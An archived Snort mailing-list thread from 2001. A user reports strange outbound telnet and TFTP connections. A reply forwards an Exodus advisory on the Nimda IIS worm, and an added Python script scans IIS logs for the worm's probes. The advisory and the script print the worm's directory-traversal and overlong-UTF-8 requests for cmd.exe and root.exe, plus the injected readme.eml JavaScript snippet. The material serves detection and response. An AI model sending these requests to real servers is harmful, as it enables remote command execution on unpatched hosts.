Snort mailing list archives
RE: Need help fast!
From: Anthony Geoffron <anthonyg () passinglane com>
Date: Tue, 18 Sep 2001 20:20:55 -0700
Here is an advisory from Exodus. But at this time it seems there is no information on how to remove this virus once you get compromised. If you guys have any information, I would appreciate it.

Exodus Confidential Customer Communication

Date: September 18, 2001
Title: Security Advisory - IIS Worm

Summary:

Exodus, as a professional courtesy to its customers, is distributing this Security Threat Advisory. As many of you have probably experienced, there is a new and prolific worm propagating across the Internet. The worm appears to target a large number of well-known vulnerabilities in Microsoft Windows IIS 4 and IIS 5. In addition to targeting Microsoft IIS web servers there is the potential that clients operating non-Microsoft sites will experience denial of service type effects as the worm scans for additional vulnerable hosts.

Proposed Remedy:

Microsoft patches are available at:
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/default.asp

The worm appears to have a number of propagation methods. Infected hosts scan their associated Class "B" address space for additional victims; they also scan open network shares and may populate their served web pages with a snippet of Java code that induces some versions of Microsoft Outlook/Outlook Express to download the hostile executable "readme.exe". The code can also propagate via email with the hostile payload bearing the name "readme.exe".

An initial analysis of the worm by the Exodus Cyber Attack Team and others within the security community revealed the following details. Victim sites initiate a tftp session with the infecting host and download "admin.dll". Once on the victim system, admin.dll performs a number of actions to include elevating the permissions of both the "guest" and "iuser" accounts to administrator and creating a trojanized version of a number of files to include:

  c:\program files\outlook express\wabmig.exe
  c:\program files\outlook express\wab.exe
  c:\program files\windows nt\pinball\pinball.exe
  c:\winnt\system32\mspaint.exe
  c:\program files\outlook express\msimn.exe
  c:\program files\internet explorer\connection wizard\isignup.exe
  c:\program files\internet explorer\connection wizard\inetwiz.exe
  c:\winnt\system32\inetsrv\inetmgr.exe
  c:\program files\internet explorer\iexplore.exe
  c:\program files\internet explorer\connection wizard\icwconn2.exe
  c:\program files\internet explorer\connection wizard\icwconn1.exe
  c:\program files\windows nt\dialer.exe
  c:\program files\netmeeting\conf.exe
  c:\winnt\system32\cmmgr32.exe

The Exodus CAT Team is in the process of analyzing these trojanized files, and additional details regarding these files will be distributed as they are discovered.

The worm also creates a file named "readme.eml". On at least one compromised system, the files appeared in the following directories:

  c:\Inetpub\wwwroot
  c:\Program Files\Common Files\System\ado
  c:\Program Files\Microsoft Script Debugger
  c:\Microsoft Script Debugger\NetMeeting
  c:\Winnt\Help\debug
  c:\Winnt\Help\iishelp
  c:\Winnt\Help\iishelp\iis
  c:\Winnt\system32\inetsrv\iisadmin

A number of websites are reporting the addition of the following snippet of code to their pages:

  </body> </html> <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

The readme.eml file appears to facilitate the downloading of the hostile code by older versions of Outlook and Outlook Express.

Until additional details about this worm are known, Exodus is recommending that any infected host be pulled off the network. Sites operating Microsoft IIS web servers that have not yet been infected should be patched immediately through the most recent Microsoft Security Advisory. All users in your enterprise should be apprised of the threat and notified of the potential risk associated with any attachments labeled "readme.exe".

A review of the IIS logs for a targeted server may display some or all of the following entries:

  GET /scripts/root.exe?/c+dir
  GET /MSADC/root.exe?/c+dir
  GET /c/winnt/system32/cmd.exe?/c+dir
  GET /d/winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
  GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
  GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
  GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
  GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir

Should you have any questions, or need any assistance please feel free to contact our Response Center at 1-877-393-7878.

Exodus does not guarantee or warrant that the information and recommendations set forth in this advisory will enable customers to stop the worm from propagating or operate a completely secure or error-free Internet site. Exodus makes no warranty or guarantee as to suitability or efficacy of any vendor supplied software patches.

Respectfully,
Exodus Communications, Inc.
"The Infrastructure for the Digital Economy"
Exodus Confidential Customer Communications
Web: <http://www.exodus.net>

-----Original Message-----
From: Sheahan, Paul (PCLN-NW) [mailto:Paul.Sheahan () priceline com]
Sent: Tuesday, September 18, 2001 4:10 PM
To: Snort List (E-mail)
Subject: [Snort-users] Need help fast!
Importance: High

Hello,

Once on Thursday I noticed an outgoing telnet connection attempt on port 23 from my web server out to the Internet. Two days later I noticed an outgoing TFTP connection attempt (port 69) from the same web server out to the Internet. I've never seen these types of connection attempts before and they are definitely NOT a good sign. But even more strange is that Snort logs an alert for these connection attempts, but does NOT log any traces! I have never seen Snort do this before. Whenever there is an alert, there has ALWAYS been a corresponding trace to refer to. But for each of these connection attempts, I have nothing to refer to. I'm using Snort 1.8.1 b78 on Red Hat Linux 7.0.

My questions for the group are:

* Has anyone seen any unexplained telnet or tftp coming from any of their servers lately? Possibly from the new w32.nimda.a.mm worm?

* Also, could this problem be a bug in Snort where it isn't logging traces properly all of the time? It logs traces fine for all of my other alerts.

Thanks,
Paul

_______________________________________________
Snort-users mailing list
Snort-users () lists sourceforge net
Go to this URL to change user options or unsubscribe:
https://lists.sourceforge.net/lists/listinfo/snort-users
Snort-users list archive:
http://www.geocrawler.com/redir-sf.php3?list=snort-users
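The two artifacts the forwarded advisory gives a defender to look for are the list of IIS log entries and the injected readme.eml page snippet. The script below is an added example for this archive page; it is not part of the advisory, not code from Exodus or Snort, and not from either poster. It assumes IIS W3C extended logs with the field order date, time, c-ip, cs-method, cs-uri-stem, cs-uri-query, sc-status; the sample log is constructed from the advisory's request strings with made-up timestamps, client addresses and status codes, and the `%%35c` and `%252f` spellings are assumed double-encoded forms of the `%35c` and `%2f` entries. It goes slightly beyond the advisory's literal list by decoding each URI up to twice and tagging what it finds (traversal, overlong UTF-8 slashes, double encoding, a reference to root.exe/cmd.exe) rather than matching the exact strings, so variants of the same probes are caught too.

```python
"""
Added example: scan IIS W3C-format log lines for the worm probes listed in the
forwarded advisory, and check served HTML for the injected readme.eml snippet.
Standard library only.
"""
import re
from urllib.parse import unquote_to_bytes

# Constructed sample log (W3C fields: date time c-ip cs-method cs-uri-stem
# cs-uri-query sc-status).  Request strings come from the advisory; the
# timestamps, client IPs and status codes are made up for this example.
SAMPLE_LOG = """\
2001-09-18 20:15:01 192.0.2.10 GET /default.htm - 200
2001-09-18 20:15:02 192.0.2.10 GET /scripts/root.exe /c+dir 404
2001-09-18 20:15:03 192.0.2.10 GET /MSADC/root.exe /c+dir 404
2001-09-18 20:15:04 192.0.2.10 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 20:15:05 192.0.2.10 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 20:15:06 192.0.2.10 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 20:15:07 192.0.2.10 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+dir 200
2001-09-18 20:15:08 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir 404
2001-09-18 20:15:09 192.0.2.10 GET /scripts/..%%35c../winnt/system32/cmd.exe /c+dir 404
2001-09-18 20:15:10 192.0.2.10 GET /scripts/..%252f../winnt/system32/cmd.exe /c+dir 404
2001-09-18 20:15:11 192.0.2.11 GET /images/logo.gif - 200
2001-09-18 20:15:12 192.0.2.12 GET /scripts/..%c0%af../winnt/win.ini - 404
"""

# Signatures derived from the advisory's log entries.
SHELL_REF = re.compile(rb"(?:root|cmd)\.exe", re.IGNORECASE)
TRAVERSAL = re.compile(rb"\.\.[\\/]")                  # ../ or ..\ once decoded
OVERLONG = re.compile(rb"\xc0[\xaf/]|\xc1[\x1c\x9c]")   # overlong UTF-8 slashes

# The page snippet quoted in the advisory (attribute order/spacing may vary).
INJECTED_SNIPPET = re.compile(
    rb"<script[^>]*>\s*window\.open\(\s*[\"']readme\.eml[\"']", re.IGNORECASE)


def decoded_forms(uri: str) -> list:
    """Raw, once-decoded and twice-decoded bytes of a request URI.

    Two rounds are needed because some probes hide the traversal under a
    second layer of %-encoding (e.g. %252f -> %2f -> /)."""
    forms = [uri.encode("latin-1", "replace")]
    for _ in range(2):
        forms.append(unquote_to_bytes(forms[-1]))
    return forms


def classify_request(uri: str) -> set:
    """Tags describing why a request URI looks like one of the worm's probes."""
    raw, once, twice = decoded_forms(uri)
    tags = set()
    if any(SHELL_REF.search(f) for f in (raw, once, twice)):
        tags.add("shell-reference")
    if TRAVERSAL.search(once) or TRAVERSAL.search(twice):
        tags.add("traversal")
    if OVERLONG.search(once) or OVERLONG.search(twice):
        tags.add("overlong-utf8")
    if twice != once:            # a second decode changed something
        tags.add("double-encoded")
    return tags


def scan_iis_log(text: str) -> list:
    """One dict per suspicious line: client, uri, tags, and whether IIS served it."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if len(fields) < 7 or not fields[4].startswith("/"):
            continue  # directive/comment line or unexpected layout
        client, stem, query, status = fields[2], fields[4], fields[5], fields[6]
        tags = classify_request(stem)
        if not tags:
            continue
        hits.append({
            "line": lineno,
            "client": client,
            "uri": stem if query == "-" else f"{stem}?{query}",
            "tags": tags,
            # A 2xx means the server acted on the probe instead of rejecting it;
            # those are the lines that warrant a host investigation.
            "served": status.isdigit() and int(status) < 300,
        })
    return hits


def page_is_injected(html: bytes) -> bool:
    """True if the HTML carries the readme.eml pop-up snippet the advisory quotes."""
    return INJECTED_SNIPPET.search(html) is not None


if __name__ == "__main__":
    for hit in scan_iis_log(SAMPLE_LOG):
        state = "SERVED" if hit["served"] else "rejected"
        print(f"line {hit['line']:2} {hit['client']:<12} {state:8} "
              f"{sorted(hit['tags'])} {hit['uri']}")
```

Feed `scan_iis_log` the contents of a real log file to get the same per-line report; the `served` flag separates probes the server refused (404) from ones it acted on, which is the distinction that decides whether a host needs to be pulled off the network as the advisory recommends. `page_is_injected` can be run over files under the web root to find pages that received the snippet. Neither function speaks to Paul's question about Snort dropping the trace for an alert; that is a sensor-side problem the log scan does not see.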
Current thread:
- Need help fast! Sheahan, Paul (PCLN-NW) (Sep 18)
- <Possible follow-ups>
- RE: Need help fast! Anthony Geoffron (Sep 18)